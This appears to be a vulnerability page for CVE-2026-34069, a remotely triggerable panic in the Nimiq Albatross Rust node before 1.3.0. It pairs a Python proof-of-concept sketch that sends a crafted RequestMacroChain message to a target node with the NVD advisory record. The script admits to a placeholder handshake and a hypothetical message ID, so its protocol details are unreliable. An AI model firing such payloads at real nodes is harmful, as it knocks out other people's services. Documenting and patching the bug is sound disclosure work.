CVE-2026-34069

# Proof of Concept for CVE-2026-34069 # This script demonstrates the logic to trigger the panic. # Note: Actual network packet structure depends on Nimiq P2P protocol specs. import socket import struct def send_malicious_p2p_message(target_ip, target_port): """ Sends a crafted RequestMacroChain message with a micro block hash as the first locator to trigger the panic. """ try: # Establish connection to the target node s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # Placeholder for P2P Handshake (simplified) # In a real scenario, a valid handshake is required first. s.send(b"HANDSHAKE_DATA...") # Construct the malicious payload # Message Type: RequestMacroChain (Hypothetical ID 0x15) msg_type = struct.pack('>H', 0x15) # Locator hashes: The first hash must be a Micro Block hash present on the main chain. # Normally this expects a Macro Block hash. # Using a dummy micro block hash for demonstration. micro_block_hash = bytes.fromhex("00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff") # Serialize payload (Length + Hash) # This is pseudo-serialization based on the vulnerability description payload = msg_type + struct.pack('>B', 1) + micro_block_hash # 1 locator # Send payload s.send(payload) print("[+] Malicious message sent. If vulnerable, the node should panic.") s.close() except Exception as e: print(f"[-] Error: {e}") # Usage # send_malicious_p2p_message("<TARGET_IP>", <TARGET_PORT>)

{"cve": {"id": "CVE-2026-34069", "sourceIdentifier": "[email protected]", "published": "2026-04-14T00:16:07.023", "lastModified": "2026-04-24T17:10:45.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "nimiq/core-rs-albatross is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. In versions 1.2.2 and below, an unauthenticated p2p peer can cause the RequestMacroChain message handler task to panic. Sending a RequestMacroChain message where the first locator hash on the victim’s main chain is a micro block hash (not a macro block hash) causes said panic. The RequestMacroChain::handle handler selects the locator based only on \"is on main chain\", then calls get_macro_blocks() and panics via .unwrap() when the selected hash is not a macro block (BlockchainError::BlockIsNotMacro). This issue has been fixed in version 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nimiq:nimiq_proof-of-stake:*:*:*:*:*:rust:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "CD0CAAD1-7626-4A4A-A6F8-9DC46FE50731"}]}]}], "references": [{"url": "https://github.com/nimiq/core-rs-albatross/commit/ae6c1e92342e72f80fd12accbe66ee80dd6802ac", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nimiq/core-rs-albatross/pull/3660", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-48m6-486p-9j8p", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}